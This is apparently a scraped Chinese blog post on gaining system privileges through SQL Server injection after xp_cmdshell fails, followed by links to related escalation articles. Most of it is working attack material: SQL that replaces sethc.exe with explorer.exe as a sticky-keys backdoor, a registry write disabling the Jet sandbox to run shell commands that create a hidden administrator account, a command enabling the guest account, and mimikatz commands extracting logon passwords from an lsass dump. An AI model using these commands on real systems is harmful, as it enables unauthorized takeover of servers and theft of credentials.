sqlserver提权失败_mssql提权遇到CreateProcess' 失败,错误代码: '5'。
方法一:
mssql 数据库注入时 exec xp_cmdshell 调用 'CreateProcess' 失败的解决办法。
微软ms sql 2000/2005 注入时exec xp_cmdshell 调用 'CreateProcess' 失败,错误代码: '5',两种解决办法。
原因不说了,一般都是cmd.exe被限制权限了,system用户没有权限,解决方法2种:
1、替换shift文件(在开启3389情况下):
下面两条语句为分别执行的。
这条语句将explorer.exe复制为sethc.exe
declare @o int exec sp_oacreate 'scripting.filesystemobject', @o out exec sp_oamethod @o, 'copyfile',null,'c:/windows/explorer.exe','c:/windows/system32/sethc.exe';
这条语句将sethc.exe复制到dllcache目录下
declare @oo int exec sp_oacreate 'scripting.filesystemobject', @oo out exec sp_oamethod @oo, 'copyfile',null,'c:/windows/system32/sethc.exe','c:/windows/system32/dllcache/sethc.exe';
另外这两条语句使用到的sp_oacreate存储过程需要使用到odsole70.dll这个文件,所以这个文件的存亡,关系到创建的成功与否。
2、直接开启acess的沙盘(沙盒),来执行命令:
EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SoftWare/Microsoft/Jet/4.0/Engines','SandBoxMode','REG_DWORD',0
Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=c:/windows/system32/ias/ias.mdb','select shell("net user 123 123 /add")');
Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=c:/windows/system32/ias/ias.mdb','select shell("net localgroup administrators 123 /add")');
注意:如果是 Windows 2000,则将以上 Windows 目录改成 winnt。
方法二:我手测的 还没有去抓流量看过程
net user guest /active:yes /expires:never
进服务器后证实了原因,
转存到本地,dump
1
2
3
4
mimikatz# sekurlsa::minidump SUPERCOMPUTER_lsass.dmp
SwitchtoMINIDUMP
mimikatz# sekurlsa::logonPasswords full
sqlserver提权失败_mssql提权遇到CreateProcess' 失败,错误代码: '5'。相关推荐
- 第三方组件提权-SQL server提权
文章目录 基础 MSSQL权限级别 拿webshell xp_cmdshell执行系统命令 LOG备份getshell 提权 使用xp_cmdshell进行提权 以下内容为转载 使用sp_oacrea ...
- 使用MSF进行提权(windows提权、linux提权、wesng使用)
文章目录 MSF Windows提权 反弹shell 提权 END推荐阅读 MSF Linux提权 反弹shell 补充wesng用法 Metasploit 是一个渗透框架,kali 内安装了,安装位 ...
- CobaltStrike使用-第五篇(Bypass UAC、CVE提权、Powerup提权)
前四篇文章介绍了CS的基本使用方法和模块,以及钓鱼攻击的方法,本篇将会介绍使用CS进行提权操作 文章目录 权限提升 Bypass UAC CVE提权 PowerUp 凭证和哈希获取 Beacon 中的 ...
- 提权学习:第三方软件提权(Server-u 提权)43958
当你的才华 还撑不起你的野心时 那你就应该静下心来学习 第三方软件提权 Server-u 提权 Serv-U FTP Server,是一种被广泛运用的FTP服务器端软件,支持3x/9x/ME/NT/2 ...
- oracle用户获取datameta权限,Oracle数据库提权(低权限提升至dba)
0x01 Oracle存储过程"缺陷" 在 Oracle 的存储过程中,有一个有趣的特点:运行权限.运行权限分为两种,definer 和 invoker. definer 为函数创 ...
- mysql提权方式linux_Linux提权的几种常用方式
本文转载自微信公众号「Bypass」,作者Bypass .转载本文请联系Bypass公众号. 在渗透测试过程中,提升权限是非常关键的一步,攻击者往往可以通过利用内核漏洞/权限配置不当/root权限运行 ...
- 提权学习:第三方软件提权(巴西烤肉提权和启动项提权)
当你的才华 还撑不起你的野心时 那你就应该静下心来学习 目录 巴西烤肉提权 启动项提权 0x01 启动项提权 0x02 启动项提权,拓展知识 [写入启动项提权/启动项里提权] 巴西烤肉提权 首先,基本 ...
- 操作系统权限提升(二十三)之Linux提权-通配符(ws)提权
系列文章 操作系统权限提升(十八)之Linux提权-内核提权 操作系统权限提升(十九)之Linux提权-SUID提权 操作系统权限提升(二十)之Linux提权-计划任务提权 操作系统权限提升(二十一) ...
- Linux提权之Suid提权 小部分归纳
Linux提权之Suid提权 SUID是linux的一种权限机制 具有这种权限的文件会在其执行的时候,使调用者暂时获得该文件拥有者的权限.如果拥有SUID权限,那么就可以利用系统中的二进制文件和工具进 ...
最新文章
- B-监狱逃脱(BFS)
- Spring Framework------version4.3.5-----Reference学习心得-----总结
- redis有值查询返回null_Redis缓存穿透、缓存并发、热点缓存之最佳招式
- MyBatis-学习笔记12【12.Mybatis注解开发】
- servlet 认证,授权
- DateOnly和TimeOnly类型居然不能序列化!!! .Net 6下实现自定义JSON序列化
- 汉字为什么能流传至今_汉字能流传至今,比毛不易还不易,它的同龄字统统都死掉了...
- POJ_3262 Protecting the Flowers 【贪心】
- ACCESS_REFUSED - operation not permitted on the default exchange
- LINQ Enumerable 续 II
- 七夕节,我用代码制作了表白信封
- 2022 Gartner新兴技术成熟曲线
- ❤️❤️马上安排!闺女想在游戏里成为【超人】,Python游戏开发模块Pygame系列之【介绍及安装】❤️❤️源码
- 【在PowerPoint中插入视频的三种方法】
- iPhone 换电池 检测新电池实际容量
- 软技能-代码外的生存指南PDF下载
- Freemarker网页静态化
- LBM学习记录1 Introduction
- windows server2016搭建FTP服务器
- VRTK基础入门案例演示